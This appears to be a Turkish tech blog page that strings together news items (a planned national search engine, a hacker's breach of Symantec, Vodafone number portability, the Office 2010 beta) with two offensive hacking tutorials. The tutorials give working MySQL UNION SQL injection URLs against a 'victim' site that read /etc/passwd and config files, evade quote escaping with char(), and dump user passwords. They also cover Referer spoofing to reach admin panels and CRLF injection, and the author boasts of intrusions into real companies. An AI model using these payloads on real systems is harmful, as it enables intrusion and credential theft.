Türk Arama Motoru 2010 Yılında !

Bilgi Teknolojileri ve İletişim Kurumu, yaptığı açıklamada yeni bir arama motoru kurulacağını açıkladı. Yeni Türk arama motoru, Google,Yahoo ve Bing gibi devlere rakip olmaya hazırlanıyor.

Bilgi Teknolojileri ve İletişim Kurumu Başkanı Tayfun Acarer yaptığı açıklamada çalışmaların devam ettiğini ve 2010 yılı içerisinde tamamlanmasının hedeflendiğini belirtti. Bu yerli arama motorunun yapılmasının sebebi, Türkiye'de yapılan aramaların, haberleşmenin yabancı ülkelere gidip geri gelmesinin oluşturduğu güvenlik açığının önüne geçmek.

Yabancı arama motorlarının Türkiye'nin ihtiyaçlarına cevap vermediğini, ülke hassasiyetlerine zaman zaman duyarsız kaldığını belirten Tayfun Acarer, popüler arama motorlarının yabancı kaynaklı olduğunu belirttikten sonra "İnternet yoluyla yapılan her türlü haberleşme yabancı ülkelere gidiyor, oradan geri geliyor. İşin bu açıdan bir güvenlik tarafı var" dedi.

Türkçe YouTube mu geliyor? 

70 milyon kişinin TC kimlik numarası eşleşmesi seviyesinde kullanılabileceği, bir mobil ağ sağlanmış olacak. Yahoo, Hotmail, Gmail gibi yabancı ve güvenli olmayan posta adresleri-ağları kullanılmamış olacak. İslam ülkeleri ile Türk cumhuriyetleri, Türkiye'nin posta altyapısını tercih edecektir. Böylece uluslararası büyük bir ağ ve internet haberleşme ortamı sağlanmış olacak." Dedi.

YouTube yasağıyla ilgili olarak da konuşan Acarer, internet sitesine erişimin 17 Ocak 2008'de Ankara 12'nci Sulh Ceza Mahkemesinin kararıyla 'Atatürk'le ilgili özel bir kanun' nedeniyle engellendiğini hatırlattı. "Engellemenin kaldırılması için YouTube yetkilileri ile pek çok görüşme yapıldı. Görüşmelerden 3'üne Ulaştırma Bakanı Binali Yıldırım da katıldı" diyen Acarer, görüşmelerin sonucunda ortaya Türkiye için yerelleştirilmiş, Türkçe bir YouTube'un düşünüldüğünü belirtti.
 

Anti-Virüs Devlerinin Belalısı Geri Döndü !

Unu'yu artık siz de tanyorsunuz. Bu yılın başlarında Romanyalı bir "seri hacker" ardı ardına büyük güvenlik firmaları hedef almış ve sitelerine saldırmıştı. Unu'nun saldırılarından Kaspersky, BitDeffender, F-Secure ve Symantec gibi devler nasibini almıştı. Ve aradan bir yıl geçmeden Unu geri döndü...

Unu son olarak Pangolin ve Sqlmap adı verilen ve özellikle hacker'lar ile güvenlik uzmanları tarafından kullanılan yazılımlar yardımıyla Symantec'in Japonya'daki sunucularına saldırdı. Unu bu saldırıcı sonucunda güvenlik devinin sunucusundaki tüm dosyalara ve veri tabanına erişebildiğini açıkladı.

Symantec yetkilileri ise saldırıyı ve meydana gelen güvenlik açığını doğruladılar ama konunun ne derece ciddi olduğuna dair henüz bir açıklama yapmadılar. Unu, saldırısının detaylarını ve ekran görüntülerini kendi blog'unda yayınladı (İngilizce). Symantec ise saldırıya uğrayan sunucunun erişimini geçici olarak durdurdu.

Vodafone Numara Taşımada Birinci ..

Türkiye'de 9 Kasım 2008'de başlayannumara taşıma özgürlüğü geçen hafta birinci yılını tamamladı. 3G sonrası yükselişini sürdüren Vodafone, Mobil Numara Taşınabilirliği'nde en çok tercih edilen operatör oldu.

GSM sektöründeki rekabetinartmasındaki en büyük etkenlerden biri olan "Mobil Numara Taşınabilirliği" uygulamasının başladığı günden bugüne kadar 8 milyondan fazla abone bu seçenekten yararlandı.

Vodafone, hizmet kalitesini sürekli yükselten yatırımları ve abonelere sunduğu avantajlı hizmet paketleriyle, performansını hızla yükselterek numara taşımanın 1. yılında en çok numara taşınan operatör oldu.

                                         3G ve Diğer Hizmetler

Konuyla ilgili yazılı açıklama yapan Vodafone Türkiye Pazarlamadan Sorumlu Genel Müdür YardımcısıGökhan Öğüt, 9 Kasım 2008'de hayata geçirilen Mobil Numara Taşınabilirliği'nin GSM arenasında rekabet ortamının iyileştirilmesine yönelik önemli bir adım olduğunu vurguladı. Öğüt, uygulama sayesinde operatörler arasındaki rekabetin abonelere fayda sağladığını belirtti. Gökhan Öğüt, 3G ve diğer kaliteli iletişim hizmetlerini tüketiciye sunanVodafone'un avantajlı tarifelerinin yanı sıra tüketicinin kalbine ve zihnine hitap eden yeni reklam kampanyalarının da numara taşıma sürecini olumlu etkilediğini kaydetti.

Numarasını Vodafone'a taşıyan abonelerin son derece memnun olduğunu aktaran Öğüt şöyle devam etti: "Numaraları değişmeden Vodafone'a taşınan yeni abonelerimiz yalnızca şebeke içinde değil, her yöne yapılan çağrılarda da sunduğumuz cazip ödeme seçeneklerinden yararlanıyorlar. Mobil Numara Taşınabilirliği uygulamasında ilk yıl sonuçlarına göre arasındaki sonuçlarına göre en çok numara taşınan operatör olduk. Vodafone olarak başarıyı yakaladığımız bu alanda, Türkiye'nin dört bir yanındaki tüm abonelerimize kaliteli hizmet sunmaktan büyük bir heyecan ve mutluluk duyuyoruz" dedi.

MS Office 2010 Beta Hazır İndirin !

Teknik ön izleme programının tamamlanmasıyla birlikte Microsoft Office 2010, kullanıcı kitlesiyle buluşmaya hazır. Yazılım devi, önümüzdeki sene piyasaya sürülecek olan Office 2010 yazılım setinin beta sürümünü halka açmış durumda.

MS Office ilk kez iki farklı mimaride geliştiriliyor: Ofis seti  hem 32- hem de 64-bit olarak kullanıma sunuluyor. Aşağıdaki indirme linkine tıkladıktan sonra Windows Live ID'niz ile oturum açtığınızda istediğiniz mimariyi seçip indirebiliyorsunuz. Yeni sürümün getirdiği yenilikler arasında daha derli toplu hale getirilmiş arabirim ve Windows 7 geliştirmeleri var. Ayrıca bu sürümde setteki tüm programlar Office 2007 ile girişi yapılanRibbon arabirimini kullanıyor.

Microsoft Office 2010'un halka açık beta sürümünün derleme numarası 14.0.4536.1000; dolayısıyla haftalar önce paylaşım ağlarına düşen sürümden daha güncel oluyor. İndirme bağlantısına tıklayıp siz de yeni nesil Office setini deneyebilirsiniz.

Office 2010 Beta; Windows XP SP3, Windows Vista SP1 (ve üzeri) ve Windows 7'de çalışmaktadır.

Download: MS Office 2010 Beta

MySQL sistemler için sql enjeksiyonu olası tehlikeler,teknikler. - 1

Genelde ülkemizde bir çok kişi MySQL ve MSSQL'un birbirinden farklı bir yapıya sahip olduğunu düşünürler.
Ancak sanılanın aksine MySQL MSSQL'a en yakın denebilecek bir yapıya sahiptir.Postgre ve Oracle ise tamamen değişik bir yapıya sahipler diyebiliriz.
Gelelim konumuza, MySQL'da yapısı itibariyle aynı anda birden çok sorgu çalıştıramıyoruz.Ancak belli prosedürler ve alt sorgular (sub query) yapabilmekteyiz.
Bu dökümanda size bir kaç püf nokta göstereceğim.En basitinden başlayalım,
SQL sorguları bildiğiniz üzere her zaman mantık kurallarına göre çalışır.UNION sorgularını bilirsiniz UNION kelime itibariyle birleşik demektir genelde güvenlik sitelerini ve maillistlerde UNION ile enjekte edilmiş sorgular görmekteyiz ancak MySQL üzerindeki bu enjeksiyonlarda MSSQL ve Access gibi tablo adı bilmeden bile bir çok şey yapabiliriz.
Örnek saldırılar;
Hedef sorgunun 4 kolona hitap ettiğini bulduk
http://kurban/muziklistesi.php?liste=-1/**/UNION/**/SELECT/**/0,1,2,3/* şeklinde adrese tarayıcımız ile ulaştık dikkat ettiyseniz FROM ve benzeri ifadeleri sorguya eklemedim.
Sayfaya ulaştık ve karşımıza 0 1 3 2 şeklinde karışık olarak veriler çıktı, ee ne var bunda? Bu şimdi bizim bir çok işimize yarayacak.
load_file fonksiyonu sayesinde sistemden önce dosya dahil etmeyi gösterelim.
Kolonu rasgele yazıyorum direk 2. kolon diye düşünmeyin
http://kurban/muziklistesi.php?liste=-1/**/UNION/**/SELECT/**/0,load_file('/etc/passwd'),2,3/*
adresine tekrar tarayıcımızdan ulaşıyoruz.
Karşımıza o meşhur /etc/passwd dosyası ve içeriği çıktı.

root:x:0:0:root:/root:/bin/tcsh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh .. devamı

şeklinde , peki bu nasıl gelişebilir bazı hostlarda magic_quotes_gpc değeri aktif (on) durumda ise veya sorgular bi şekilde ' " gibi karakterleri escape edilip \' halini alıyor nasıl '/etc/passwd' yazıcaz edicez.
Basit char fonksiyonu ile bu dosyalara ulaşabiliriz.
'/etc/passwd' bu şekilde yazıcaz char(47,101,116,99,47,112,97,115,115,119,100)
dolayısıyla sorgumuz http://kurban/muziklistesi.php?liste=-1/**/UNION/**/SELECT/**/0,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),2,3/* şeklini alacak.
Peki bu daha nasıl gelişebilir.Bu yöntem ile sunucu tabanlı dosyalarıda okuyabiliriz gene iznimiz çerçevesinde, dolayısıyla kullanıcının eğer hata mesajı ile bulunduğu dizini alabildiysek config.php gibi dosyaları açıp okuyabiliriz.Bu şekilde bir çok büyük sitede bulduğum SQL enjektesi ile kendilerinin scriptlerini çekmiştim :).Hatta bu config dosyalarının içlerindeki db şifreleri ile sunucuda klasik phpmyadmin klasörüne erişip MySQL hesabına bağlanıp veritabanına erişim sağlayabiliriz.
Not: Şuana kadar olan bütün çalışmaları ve örneklemeleri *nix tabanlı sistemlere göre anlattım aklınız karışmasın.
Peki diyelim UNION sorgu tek kolona eşit geldi ne yapabilirim ben 4 5 kolon bilgisi çekicem, nasıl yapabilirim?..
Basit concat fonksiyonu ile birden çok değeri birleştirebiliriz.
Örnek sorgu: http://kurban/muziklistesi.php?liste=-1/**/UNION/**/SELECT/**/concat('Üye adı:',char(32),username,'Şifre:',char(32),password)/**/from/**/mymembers/*
Bu sorgu sonucu

Üye adı: osman Şifre: o1s2m3a4n5

gibi bir veri dönecek size, tabiki gene char fonksiyonu kullanabilirsiniz.
Ayrıca MySQL için genel tablo adları:

mysql.user
mysql.host
mysql.db

Gene aynı şekilde MySQL kriptolanmış kullanıcı şifrelerini öğrenme,dosyalara veri çıkarma ve bunlara erişme ile ilgili bir dökümanda ilerde yazıcam bugünlük bu kadar,

Bir sistemin üzerindeki açıklar nasıl bulunur ve kullanılır?

Evet uzun zamandır yazmayı düşündüğüm bu dökümanımı bugüne kadar elde ettiğim tecrübelerden birebir aktarıyorum.Şuan için web tabanlı uygulamalar ilgili benim kullandığım yöntemleri yazıyorum.

Uygulama hatalarını bulmanın en kolay yolları;

Mevcut sayfalarla oynamak,
Uygulamaya ait formlarla oynamak,
Headerlarla oynamak,
Çerezlerle oynamak,


Uygulamanın kaynak kodlarından yararlanma:
(Genel içerik: çapraz site betiklenmesi (XSS) ve SQL enjeksiyonu)

En basit ve en yararlı olan yöntemdir. Basit dediğime bakmayın oldukça uğraştırır aslında.Nedenine gelince bazen bu sistemlerin hangi uygulamaları kullandığını bulmak oldukça zordur ve eğer public bir uygulama değilse örneğin (PHPNuke,PostNuke gibi) bu yöntemi denemenizi tavsiye etmem.

Kaynak kodunu ele geçirdiğiniz uygulamayı önce yerel bir sunucudaki kendi sisteminize bu uygulamayı destekleyen bir sunucu kurmalısınız (PHP tabanlı uygulamalar için: PHPTriad,ApacheTriad gibi sunucu paketleri sizin için idealdir, ASP ve FrontPage tabanlı sistemler için PWS sizler için idealdir ve PWS Windows ile gelir) bu sunucuyu kurdukdan sonra uygulamayı sunucunuz üzerinde çalıştırın.

Sonra birebir bütün heryerini önce kurcalayın ve bir hata ile karşılaştığınızdaki bu uygulamada var olan açığın ilk adımını bulmuşsunuz demekdir ki,

Bu hata mesajı bazen debug output olarak karşınıza çıkarsa ve alttaki örnek gibiyse


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or' at line 1


1. satırdaki kodu inceleyin mevcut hatamız SQL ile ilgili gördüğünüz gibi burdaki fonksiyonu ve mevcut SQL sorgusuna dikkat edin ve neler yapılabileceğinizi deneyin.

Bazen hata mesajı almasanızda bir tuhaflık gözünüze çarpar örneğin uygulamamıza yerel sunucumuzdan şöyle eriştiğimizi varsayalım;


http://localhost/research/xxxforum/read.php?id=2 or


Eğer read.php bize normalde mesaj yazması gereken yerde hiç birşey göstermediyse.
read.php dosyasını bir metin düzenleyicisi yardımıyla örnek: notepad açın,sonra tek tek bütün kodları inceleyin özellikle read.php'nin sunucudan "GET" yöntemi ile gelen sorgulara hangi fonksiyon ile nasıl yanıt verdiğine bakmalısınız.Eğer fonksiyonda bir terslik gözünüze çarpar ise örnek bir hatalı fonksiyon yazalım.


function readip() {
@mysql_connect($uo_sqlhost, $uo_sqluser, $uo_sqlpass) or die("Cannot connect to SQL server");
@mysql_select_db($uo_sqlbase) or die("Cannot select database");
$uo_ip = $_GET['SIP'];
$uo_query = "SELECT lastvisit FROM users_online WHERE visitor = $uo_ip";
$uo_result = mysql_query($uo_query);
echo $uo_result;
}

gördüğünüz gibi fonksiyonda bir hatamız mevcut.

$uo_query = "SELECT lastvisit FROM users_online WHERE visitor = $uo_ip";

tam olarak düzenli yazılmamış bir SQL sorgusu bu sorguya GET yöntemi ile gelen SIP sorgusundaki bir dikkatsizlik sayesinde çok kolay bir şekilde SQL sorgusu enjekte edebiliriz.
Hatta uzaktan kod çalıştırma dahi yapabiliriz.

Uygulamaları yazan kişiler genelde print (yazdırma) ve view (görüntüleme) sistemlerine ne yazikki dizayndan başka bir önem vermezler ve genelde bütün açıklar bu sayfalarda çıkar.

Eğer uygulamanın kaynak kodlarına erişemezseniz, mevcut uygulamaya ulaştığınız web sunucusundan en yukarda bahsettiğim metodları kullanarak az kafasını kurcalamaya çalışarak bir çok açık bulabilirsiniz.

Genelde büyük ve özel sunuculardaki açıklar böyle bulunmuştur. Bir çok büyük firmanın sistemine girdiğimde (BigFoot,ICQmail,NetZero,Superonline) bu tarz açıklar bulmuştum.

Çerezlerle oynamak:

Çerezler aslında HTTP requestte Cookie: headerıyla sunucuya yolladığımız ve sistemin bizi kolayca hatırlamasını sağlayan değerler.Bu değerlerle ufak oynamalar yaparak kendimizi sistem adminiymiş gibi gösterebiliriz bu metodu artık çoğunuz biliyorsunuz.Fazla anlatmaya gerek yok=)

Referans değişimi (referer spoofing):

Aslında buda headerlar ile oynamak kapsamına girer ancak dikkatsiz programcılar halen bu eski sistemi kullanmaktalar.Bir çoğunuz bu yöntemi porno sitelere girerken çok kullanıyorsunuz.
Burdaki mantık sokete HTTP requesti yollarken sitemizi abudik.com varsayarsak


GET admin.asp HTTP/1.1
Referer: http://www.abudik.com/login.asp

Şekline ufak bir data değişimi ile sistemin admin paneline girmemizi sağlar.

Satır atlattırma CRLF enjeksiyonu

Buda headerlarla oynamakdan geçer. Basit bir şekilde sokette headera /n/n (ters slash olucak onlar) karakterleri yazdırılır ve eğer sistem bu ufak oyunumuzu yutar ise istediğimiz headerı yazabilir, SQL enjeksiyondan , uzaktan kod çalıştırılmasına kadar bir çok şeyi yapabiliriz.

Bu yöntemlerin hepsi zamanla deneyerek öğrenilecek ve bir süre sonra alışkanlık yapacak yöntemler kendi metodlarınızı kullanarak bu yöntemleri geliştirebilirsiniz.